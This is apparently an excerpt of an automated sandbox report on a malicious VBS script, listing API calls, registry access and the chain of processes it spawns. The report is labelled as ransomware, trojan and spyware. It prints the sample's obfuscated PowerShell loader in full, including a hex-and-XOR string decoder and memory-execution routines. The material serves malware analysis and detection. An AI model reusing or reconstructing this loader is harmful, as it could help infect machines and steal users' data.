      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05892A80 NtClose,LdrInitializeThunk,22_2_05892A80
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05892AC0 NtEnumerateValueKey,LdrInitializeThunk,22_2_05892AC0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05892A10 NtWriteFile,LdrInitializeThunk,22_2_05892A10
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05894570 NtSuspendThread,22_2_05894570
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05894260 NtSetContextThread,22_2_05894260
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05892DA0 NtReadVirtualMemory,22_2_05892DA0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05892D50 NtWriteVirtualMemory,22_2_05892D50
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05893C90 NtOpenThread,22_2_05893C90
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05892CD0 NtEnumerateKey,22_2_05892CD0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05892C10 NtOpenProcess,22_2_05892C10
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05892C20 NtSetInformationFile,22_2_05892C20
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05893C30 NtOpenProcessToken,22_2_05893C30
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05892C50 NtUnmapViewOfSection,22_2_05892C50
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05892F30 NtOpenDirectoryObject,22_2_05892F30
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05892E80 NtCreateProcessEx,22_2_05892E80
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05892EB0 NtProtectVirtualMemory,22_2_05892EB0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05892EC0 NtQuerySection,22_2_05892EC0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05892ED0 NtResumeThread,22_2_05892ED0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05892E00 NtQueueApcThread,22_2_05892E00
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058929D0 NtWaitForSingleObject,22_2_058929D0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058938D0 NtGetContextThread,22_2_058938D0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05892BE0 NtQueryVirtualMemory,22_2_05892BE0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05892B20 NtQueryInformationProcess,22_2_05892B20
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05892AA0 NtQueryInformationFile,22_2_05892AA0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0502C790 NtCreateFile,22_2_0502C790
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0502C970 NtAllocateVirtualMemory,22_2_0502C970
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0502C840 NtReadFile,22_2_0502C840
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0502C890 NtDeleteFile,22_2_0502C890
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0502C8C0 NtClose,22_2_0502C8C0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0502C7E2 NtReadFile,22_2_0502C7E2
      Source: cnf13429226.vbsInitial sample: Strings found which are bigger than 50
      Source: C:\Windows\System32\wscript.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\cnf13429226.vbs"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$nonreliableness = """InFSauPanRecbutPeiRaoHunSm AfSHapOviSknRedRdeRerAeoHukTvsMa0Ch La{Af Co Ph In FrpbaaFirUraEkmBe(Sp[stSFotOrrGaiRenHigAm]Ud`$giAPanAntPohKrrStoAppCroResVecVeoBopOryCa)Id;Am Ga Le St Tr`$EpKChaudnViuSerWeisi Pr=Ho buNAleBiwCr-FrONubMojSkechcFotbi DebReyfitCoeFo[Fo]Pa Tu(Gr`$OuAAbnFatAshUnrDyoDupHeonosNocInoRepVayHy.ReLUneshnDigTotNahPi Ov/Se De2Un)Pr;Sq Ku Re Af MuFKroGerTr(Af`$SvTSirQuaHycBltUriSulMoiSutOvyAm=Wa0Sp;Un Ra`$BoTDerBoaAncVitToiLalTsiChtSeyBl Am-PalPltFe Al`$ChAChnNotInhOlrTyoMepseoPlsSycApoBspPryBu.StLUnePanWugDytsyhre;Fl Zo`$StTParUnaPrcUntDiirelPeiVitNoyPh+Pr=An2St)Ne{Dy Br Ch`$FoBBeaForFobJuaAgrHyoViuFesTh Qu=Th Ca`$XiAAfnSgtFahUnrJaoTepBroDesHecHyoEjpUlyRe.AnSHjuMabDisLotKurUriCynangSe(Ag`$TaTVerNeaUdcLktOvilelBiiSttKeyCo,ty Vr2St)Ti;Re Ba Fa Ge Bl Sv Bl Se Ns`$DrKSaaEunKouHorApiDa[Pr`$MeTBlrMeaFecBltObiUdlPriSttNoyFa/Ge2Am]Tr Ti=Ru Pa[HucDeoTanAlvBleSnrCotPe]Sy:Kl:ViTEdoPuBAfyAmtPrePr(Au`$HoBPraMirEybReaCirTaoOmuImsSy,Ov St1De6Im)St;To Be Ra`$BoKMiaNanTruBorTuise[Fl`$skTDorAmaSecIntUniChlMoiwatPlyRo/Au2Pr]Re Le=Go ba(Ba`$ToKUdaInnUnuVirUniCa[Un`$soTKrrScaAkcTitSeiFylJuiSutThyBr/em2Fo]In Un-BrbMexLkoTrrLa Vu1St5Co1Sa)Va;Du Lt In Be Ko}un Mi[suSTrtSerCaiAmnFigLi]Ch[maSboyLasDitSteAnmFi.haTSmeNexTutMo.BaEFrnEscAtoMadNoiAtnengSn]St:ca:TiAToSZeCFoIskIDr.ClGsueFitGlSFotBerStikanimgSe(St`$GrKKlaSknAnuKrrFoiCr)Ha;Gi}He`$ToMHuategOpnStaVelNoeCo2Me7De0Ga=ArSTopMiiFrnAcdPreHorSaoFakErsFr0Fa Fo'HiCOp4KeEUnEryEta4HoEAl3HaFUd2DoFSyAGrBsh9InFFj3ThFLaBAnFBoBOf'Ca;Ga`$SeMKeaUngVinnaaImlTeeDe2Kp7Al1In=TeSLopBiiDunIndSieUirFyoGekCosTa0tu Sh'FiDThAUnFGlEArFVi4LeEDi5TrFSt8EnEWa4ReFIr8KrFDi1FeEDi3BrBBa9InCKa0HuFOmEDrFFu9FaABa4SaAUn5BuBDe9GiCSl2NoFMa9KuEGe4WaFRe6MaFNo1MaFAr2KoDFu9KoFRk6FoETe3ReFGaEBaEMe1ThFEx2DoDKaAFrFMa2TaEGa3NaFEsFEcFMo8SkFPe3PrEBr4Ko'mu;El`$ImMNoaUdgNonCoaMalHoeEm2Om7Is2Pr=ApSDapskiHenAadOpeDerKooTikFrsDa0Bu fy'BoDSy0InFNa2FaEAd3DeCKu7OvECa5FoFSk8OvFPo4CuDfi6RoFEc3LeFSp3SkENs5AuFSy2InELs4ArEBa4Lg'Fo;Co`$MaMfiaRogSonHaaHolNgesy2St7Re3Ga=FySNypFliBlnEmdAmePhrMooSikStsKl0Di To'MyCHe4YaEfrEFeEDe4SeEhi3SoFTi2TeFOiAStBSl9inCSe5UhECi2loFPa9DrEKl3ViFFjETiFCaAclFCh2StBTe9GrDCoEOvFHo9PaEEl3NiFVi2OlETr5RoFAb8PrESa7StCpr4OdFGa2InETe5ToEGi1blFUdEFnFTi4TiFKb2CaEFl4SeBOt9UnDAnFChFSe6PyFYt9DeFOv3SyFEdBStFBo2SkCRe5MyFNo2AsFCe1Mo'Da;Mo`$ReMHyaStgFunToaRelnoeSl2tu7Ov4Pu=VeSTrpSaiKinVedPreKirFioUdkLesDr0Na Hi'FoEAf4ToESu3YaESt5SaFVoEFlFla9ZeFMa0Kv'Su;Ye`$DrMEnaMegkanEraJolRteCe2Cl7Va5Fo=MiSYdpHiitenThdSteCorSeoPrkCisrg0Pr Dr'KvDCo0SpFEg2YeEPd3inDUrAStFUn8CaFEn3PrEAm2NoFReBSiFPr2ChDViFInFGu6MeFca9FoFFu3ZyFHyBIgFEs2Ek'Do;Mo`$PrMPeaKegFrnScaRelHeeUn2Mi7Re6Li=LeSFopGiiSynBedvieInrXeospkZasGa0Ni vi'SyCJi5SmCHe3AsCAn4FoEbu7RdFSt2NoFCy4PeFFoEFoFRe6BiFBiBBeDro9RaFAn6NaFQuATyFDy2moBPaBClBso7EtDFoFDeFChEYeFMa3DrFSp2tuDSl5KdEGaEteCun4udFEcEomFKa0FdBAbBFiBPu7RaCSv7HaEFe2LaFHi5FaFLaBVaFPoESeFPy4So'Ra;Me`$ArMApaStgfonPraPrlSteV
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Spinderoks0 { param([String]$Anthroposcopy); $Kanuri = New-Object byte[] ($Anthroposcopy.Length / 2); For($Tractility=0; $Tractility -lt $Anthroposcopy.Length; $Tractility+=2){ $Barbarous = $Anthroposcopy.Substring($Tractility, 2); $Kanuri[$Tractility/2] = [convert]::ToByte($Barbarous, 16); $Kanuri[$Tractility/2] = ($Kanuri[$Tractility/2] -bxor 151); } [String][System.Text.Encoding]::ASCII.GetString($Kanuri);}$Magnale270=Spinderoks0 'C4EEE4E3F2FAB9F3FBFB';$Magnale271=Spinderoks0 'DAFEF4E5F8E4F8F1E3B9C0FEF9A4A5B9C2F9E4F6F1F2D9F6E3FEE1F2DAF2E3FFF8F3E4';$Magnale272=Spinderoks0 'D0F2E3C7E5F8F4D6F3F3E5F2E4E4';$Magnale273=Spinderoks0 'C4EEE4E3F2FAB9C5E2F9E3FEFAF2B9DEF9E3F2E5F8E7C4F2E5E1FEF4F2E4B9DFF6F9F3FBF2C5F2F1';$Magnale274=Spinderoks0 'E4E3E5FEF9F0';$Magnale275=Spinderoks0 'D0F2E3DAF8F3E2FBF2DFF6F9F3FBF2';$Magnale276=Spinderoks0 'C5C3C4E7F2F4FEF6FBD9F6FAF2BBB7DFFEF3F2D5EEC4FEF0BBB7C7E2F5FBFEF4';$Magnale277=Spinderoks0 'C5E2F9E3FEFAF2BBB7DAF6F9F6F0F2F3';$Magnale278=Spinderoks0 'C5F2F1FBF2F4E3F2F3D3F2FBF2F0F6E3F2';$Magnale279=Spinderoks0 'DEF9DAF2FAF8E5EEDAF8F3E2FBF2';$Dunc0=Spinderoks0 'DAEED3F2FBF2F0F6E3F2C3EEE7F2';$Dunc1=Spinderoks0 'D4FBF6E4E4BBB7C7E2F5FBFEF4BBB7C4F2F6FBF2F3BBB7D6F9E4FED4FBF6E4E4BBB7D6E2E3F8D4FBF6E4E4';$Dunc2=Spinderoks0 'DEF9E1F8FCF2';$Dunc3=Spinderoks0 'C7E2F5FBFEF4BBB7DFFEF3F2D5EEC4FEF0BBB7D9F2E0C4FBF8E3BBB7C1FEE5E3E2F6FB';$Dunc4=Spinderoks0 'C1FEE5E3E2F6FBD6FBFBF8F4';$Dunc5=Spinderoks0 'F9E3F3FBFB';$Dunc6=Spinderoks0 'D9E3C7E5F8E3F2F4E3C1FEE5E3E2F6FBDAF2FAF8E5EE';$Dunc7=Spinderoks0 'DED2CF';$Dunc8=Spinderoks0 'CB';$Udmundingers=Spinderoks0 'C2C4D2C5A4A5';$Intercessions=Spinderoks0 'D4F6FBFBC0FEF9F3F8E0C7E5F8F4D6';function fkp {Param ($Opringningernes, $Introsuction) ;$Skurvs0 =Spinderoks0 'B3D5F8E1F2F9F5E5F6FAE4F2FDFBF2F9F2E4B7AAB7BFCCD6E7E7D3F8FAF6FEF9CAADADD4E2E5E5F2F9E3D3F8FAF6FEF9B9D0F2E3D6E4E4F2FAF5FBFEF2E4BFBEB7EBB7C0FFF2E5F2BAD8F5FDF2F4E3B7ECB7B3C8B9D0FBF8F5F6FBD6E4E4F2FAF5FBEED4F6F4FFF2B7BAD6F9F3B7B3C8B9DBF8F4F6E3FEF8F9B9C4E7FBFEE3BFB3D3E2F9F4AFBECCBAA6CAB9D2E6E2F6FBE4BFB3DAF6F0F9F6FBF2A5A0A7BEB7EABEB9D0F2E3C3EEE7F2BFB3DAF6F0F9F6FBF2A5A0A6BE';&($Dunc7) $Skurvs0;$Skurvs5 = Spinderoks0 'B3D2EFF4FBE2E4FEF8F9FEE4FAB7AAB7B3D5F8E1F2F9F5E5F6FAE4F2FDFBF2F9F2E4B9D0F2E3DAF2E3FFF8F3BFB3DAF6F0F9F6FBF2A5A0A5BBB7CCC3EEE7F2CCCACAB7D7BFB3DAF6F0F9F6FBF2A5A0A4BBB7B3DAF6F0F9F6FBF2A5A0A3BEBE';&($Dunc7) $Skurvs5;$Skurvs1 = Spinderoks0 'E5F2E3E2E5F9B7B3D2EFF4FBE2E4FEF8F9FEE4FAB9DEF9E1F8FCF2BFB3F9E2FBFBBBB7D7BFCCC4EEE4E3F2FAB9C5E2F9E3FEFAF2B9DEF9E3F2E5F8E7C4F2E5E1FEF4F2E4B9DFF6F9F3FBF2C5F2F1CABFD9F2E0BAD8F5FDF2F4E3B7C4EEE4E3F2FAB9C5E2F9E3FEFAF2B9DEF9E3F2E5F8E7C4F2E5E1FEF4F2E4B9DFF6F9F3FBF2C5F2F1BFBFD9F2E0BAD8F5FDF2F4E3B7DEF9E3C7E3E5BEBBB7BFB3D5F8E1F2F9F5E5F6FAE4F2FDFBF2F9F2E4B9D0F2E3DAF2E3FFF8F3BFB3DAF6F0F9F6FBF2A5A0A2BEBEB9DEF9E1F8FCF2BFB3F9E2FBFBBBB7D7BFB3D8E7E5FEF9F0F9FEF9F0F2E5F9F2E4BEBE
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe C:\Program Files (x86)\internet explorer\ielowutil.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe "C:\Program Files (x86)\internet explorer\ielowutil.exe"
      Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe "C:\Program Files (x86)\internet explorer\ielowutil.exe"
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
      Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4496 -s 284
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$nonreliableness = """InFSauPanRecbutPeiRaoHunSm AfSHapOviSknRedRdeRerAeoHukTvsMa0Ch La{Af Co Ph In FrpbaaFirUraEkmBe(Sp[stSFotOrrGaiRenHigAm]Ud`$giAPanAntPohKrrStoAppCroResVecVeoBopOryCa)Id;Am Ga Le St Tr`$EpKChaudnViuSerWeisi Pr=Ho buNAleBiwCr-FrONubMojSkechcFotbi DebReyfitCoeFo[Fo]Pa Tu(Gr`$OuAAbnFatAshUnrDyoDupHeonosNocInoRepVayHy.ReLUneshnDigTotNahPi Ov/Se De2Un)Pr;Sq Ku Re Af MuFKroGerTr(Af`$SvTSirQuaHycBltUriSulMoiSutOvyAm=Wa0Sp;Un Ra`$BoTDerBoaAncVitToiLalTsiChtSeyBl Am-PalPltFe Al`$ChAChnNotInhOlrTyoMepseoPlsSycApoBspPryBu.StLUnePanWugDytsyhre;Fl Zo`$StTParUnaPrcUntDiirelPeiVitNoyPh+Pr=An2St)Ne{Dy Br Ch`$FoBBeaForFobJuaAgrHyoViuFesTh Qu=Th Ca`$XiAAfnSgtFahUnrJaoTepBroDesHecHyoEjpUlyRe.AnSHjuMabDisLotKurUriCynangSe(Ag`$TaTVerNeaUdcLktOvilelBiiSttKeyCo,ty Vr2St)Ti;Re Ba Fa Ge Bl Sv Bl Se Ns`$DrKSaaEunKouHorApiDa[Pr`$MeTBlrMeaFecBltObiUdlPriSttNoyFa/Ge2Am]Tr Ti=Ru Pa[HucDeoTanAlvBleSnrCotPe]Sy:Kl:ViTEdoPuBAfyAmtPrePr(Au`$HoBPraMirEybReaCirTaoOmuImsSy,Ov St1De6Im)St;To Be Ra`$BoKMiaNanTruBorTuise[Fl`$skTDorAmaSecIntUniChlMoiwatPlyRo/Au2Pr]Re Le=Go ba(Ba`$ToKUdaInnUnuVirUniCa[Un`$soTKrrScaAkcTitSeiFylJuiSutThyBr/em2Fo]In Un-BrbMexLkoTrrLa Vu1St5Co1Sa)Va;Du Lt In Be Ko}un Mi[suSTrtSerCaiAmnFigLi]Ch[maSboyLasDitSteAnmFi.haTSmeNexTutMo.BaEFrnEscAtoMadNoiAtnengSn]St:ca:TiAToSZeCFoIskIDr.ClGsueFitGlSFotBerStikanimgSe(St`$GrKKlaSknAnuKrrFoiCr)Ha;Gi}He`$ToMHuategOpnStaVelNoeCo2Me7De0Ga=ArSTopMiiFrnAcdPreHorSaoFakErsFr0Fa Fo'HiCOp4KeEUnEryEta4HoEAl3HaFUd2DoFSyAGrBsh9InFFj3ThFLaBAnFBoBOf'Ca;Ga`$SeMKeaUngVinnaaImlTeeDe2Kp7Al1In=TeSLopBiiDunIndSieUirFyoGekCosTa0tu Sh'FiDThAUnFGlEArFVi4LeEDi5TrFSt8EnEWa4ReFIr8KrFDi1FeEDi3BrBBa9InCKa0HuFOmEDrFFu9FaABa4SaAUn5BuBDe9GiCSl2NoFMa9KuEGe4WaFRe6MaFNo1MaFAr2KoDFu9KoFRk6FoETe3ReFGaEBaEMe1ThFEx2DoDKaAFrFMa2TaEGa3NaFEsFEcFMo8SkFPe3PrEBr4Ko'mu;El`$ImMNoaUdgNonCoaMalHoeEm2Om7Is2Pr=ApSDapskiHenAadOpeDerKooTikFrsDa0Bu fy'BoDSy0InFNa2FaEAd3DeCKu7OvECa5FoFSk8OvFPo4CuDfi6RoFEc3LeFSp3SkENs5AuFSy2InELs4ArEBa4Lg'Fo;Co`$MaMfiaRogSonHaaHolNgesy2St7Re3Ga=FySNypFliBlnEmdAmePhrMooSikStsKl0Di To'MyCHe4YaEfrEFeEDe4SeEhi3SoFTi2TeFOiAStBSl9inCSe5UhECi2loFPa9DrEKl3ViFFjETiFCaAclFCh2StBTe9GrDCoEOvFHo9PaEEl3NiFVi2OlETr5RoFAb8PrESa7StCpr4OdFGa2InETe5ToEGi1blFUdEFnFTi4TiFKb2CaEFl4SeBOt9UnDAnFChFSe6PyFYt9DeFOv3SyFEdBStFBo2SkCRe5MyFNo2AsFCe1Mo'Da;Mo`$ReMHyaStgFunToaRelnoeSl2tu7Ov4Pu=VeSTrpSaiKinVedPreKirFioUdkLesDr0Na Hi'FoEAf4ToESu3YaESt5SaFVoEFlFla9ZeFMa0Kv'Su;Ye`$DrMEnaMegkanEraJolRteCe2Cl7Va5Fo=MiSYdpHiitenThdSteCorSeoPrkCisrg0Pr Dr'KvDCo0SpFEg2YeEPd3inDUrAStFUn8CaFEn3PrEAm2NoFReBSiFPr2ChDViFInFGu6MeFca9FoFFu3ZyFHyBIgFEs2Ek'Do;Mo`$PrMPeaKegFrnScaRelHeeUn2Mi7Re6Li=LeSFopGiiSynBedvieInrXeospkZasGa0Ni vi'SyCJi5SmCHe3AsCAn4FoEbu7RdFSt2NoFCy4PeFFoEFoFRe6BiFBiBBeDro9RaFAn6NaFQuATyFDy2moBPaBClBso7EtDFoFDeFChEYeFMa3DrFSp2tuDSl5KdEGaEteCun4udFEcEomFKa0FdBAbBFiBPu7RaCSv7HaEFe2LaFHi5FaFLaBVaFPoESeFPy4So'Ra;Me`$ArMApaStgfonPraPrlSteVJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Spinderoks0 { param([String]$Anthroposcopy); $Kanuri = New-Object byte[] ($Anthroposcopy.Length / 2); For($Tractility=0; $Tractility -lt $Anthroposcopy.Length; $Tractility+=2){ $Barbarous = $Anthroposcopy.Substring($Tractility, 2); $Kanuri[$Tractility/2] = [convert]::ToByte($Barbarous, 16); $Kanuri[$Tractility/2] = ($Kanuri[$Tractility/2] -bxor 151); } [String][System.Text.Encoding]::ASCII.GetString($Kanuri);}$Magnale270=Spinderoks0 'C4EEE4E3F2FAB9F3FBFB';$Magnale271=Spinderoks0 'DAFEF4E5F8E4F8F1E3B9C0FEF9A4A5B9C2F9E4F6F1F2D9F6E3FEE1F2DAF2E3FFF8F3E4';$Magnale272=Spinderoks0 'D0F2E3C7E5F8F4D6F3F3E5F2E4E4';$Magnale273=Spinderoks0 'C4EEE4E3F2FAB9C5E2F9E3FEFAF2B9DEF9E3F2E5F8E7C4F2E5E1FEF4F2E4B9DFF6F9F3FBF2C5F2F1';$Magnale274=Spinderoks0 'E4E3E5FEF9F0';$Magnale275=Spinderoks0 'D0F2E3DAF8F3E2FBF2DFF6F9F3FBF2';$Magnale276=Spinderoks0 'C5C3C4E7F2F4FEF6FBD9F6FAF2BBB7DFFEF3F2D5EEC4FEF0BBB7C7E2F5FBFEF4';$Magnale277=Spinderoks0 'C5E2F9E3FEFAF2BBB7DAF6F9F6F0F2F3';$Magnale278=Spinderoks0 'C5F2F1FBF2F4E3F2F3D3F2FBF2F0F6E3F2';$Magnale279=Spinderoks0 'DEF9DAF2FAF8E5EEDAF8F3E2FBF2';$Dunc0=Spinderoks0 'DAEED3F2FBF2F0F6E3F2C3EEE7F2';$Dunc1=Spinderoks0 'D4FBF6E4E4BBB7C7E2F5FBFEF4BBB7C4F2F6FBF2F3BBB7D6F9E4FED4FBF6E4E4BBB7D6E2E3F8D4FBF6E4E4';$Dunc2=Spinderoks0 'DEF9E1F8FCF2';$Dunc3=Spinderoks0 'C7E2F5FBFEF4BBB7DFFEF3F2D5EEC4FEF0BBB7D9F2E0C4FBF8E3BBB7C1FEE5E3E2F6FB';$Dunc4=Spinderoks0 'C1FEE5E3E2F6FBD6FBFBF8F4';$Dunc5=Spinderoks0 'F9E3F3FBFB';$Dunc6=Spinderoks0 'D9E3C7E5F8E3F2F4E3C1FEE5E3E2F6FBDAF2FAF8E5EE';$Dunc7=Spinderoks0 'DED2CF';$Dunc8=Spinderoks0 'CB';$Udmundingers=Spinderoks0 'C2C4D2C5A4A5';$Intercessions=Spinderoks0 'D4F6FBFBC0FEF9F3F8E0C7E5F8F4D6';function fkp {Param ($Opringningernes, $Introsuction) ;$Skurvs0 =Spinderoks0 'B3D5F8E1F2F9F5E5F6FAE4F2FDFBF2F9F2E4B7AAB7BFCCD6E7E7D3F8FAF6FEF9CAADADD4E2E5E5F2F9E3D3F8FAF6FEF9B9D0F2E3D6E4E4F2FAF5FBFEF2E4BFBEB7EBB7C0FFF2E5F2BAD8F5FDF2F4E3B7ECB7B3C8B9D0FBF8F5F6FBD6E4E4F2FAF5FBEED4F6F4FFF2B7BAD6F9F3B7B3C8B9DBF8F4F6E3FEF8F9B9C4E7FBFEE3BFB3D3E2F9F4AFBECCBAA6CAB9D2E6E2F6FBE4BFB3DAF6F0F9F6FBF2A5A0A7BEB7EABEB9D0F2E3C3EEE7F2BFB3DAF6F0F9F6FBF2A5A0A6BE';&($Dunc7) $Skurvs0;$Skurvs5 = Spinderoks0 'B3D2EFF4FBE2E4FEF8F9FEE4FAB7AAB7B3D5F8E1F2F9F5E5F6FAE4F2FDFBF2F9F2E4B9D0F2E3DAF2E3FFF8F3BFB3DAF6F0F9F6FBF2A5A0A5BBB7CCC3EEE7F2CCCACAB7D7BFB3DAF6F0F9F6FBF2A5A0A4BBB7B3DAF6F0F9F6FBF2A5A0A3BEBE';&($Dunc7) $Skurvs5;$Skurvs1 = Spinderoks0 'E5F2E3E2E5F9B7B3D2EFF4FBE2E4FEF8F9FEE4FAB9DEF9E1F8FCF2BFB3F9E2FBFBBBB7D7BFCCC4EEE4E3F2FAB9C5E2F9E3FEFAF2B9DEF9E3F2E5F8E7C4F2E5E1FEF4F2E4B9DFF6F9F3FBF2C5F2F1CABFD9F2E0BAD8F5FDF2F4E3B7C4EEE4E3F2FAB9C5E2F9E3FEFAF2B9DEF9E3F2E5F8E7C4F2E5E1FEF4F2E4B9DFF6F9F3FBF2C5F2F1BFBFD9F2E0BAD8F5FDF2F4E3B7DEF9E3C7E3E5BEBBB7BFB3D5F8E1F2F9F5E5F6FAE4F2FDFBF2F9F2E4B9D0F2E3DAF2E3FFF8F3BFB3DAF6F0F9F6FBF2A5A0A2BEBEB9DEF9E1F8FCF2BFB3F9E2FBFBBBB7D7BFB3D8E7E5FEF9F0F9FEF9F0F2E5F9F2E4BEBEJump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exeJump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe "C:\Program Files (x86)\internet explorer\ielowutil.exe" Jump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe "C:\Program Files (x86)\internet explorer\ielowutil.exe" Jump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pmmjiyi1.kor.ps1Jump to behavior
      Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winVBS@27/4@21/17
      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
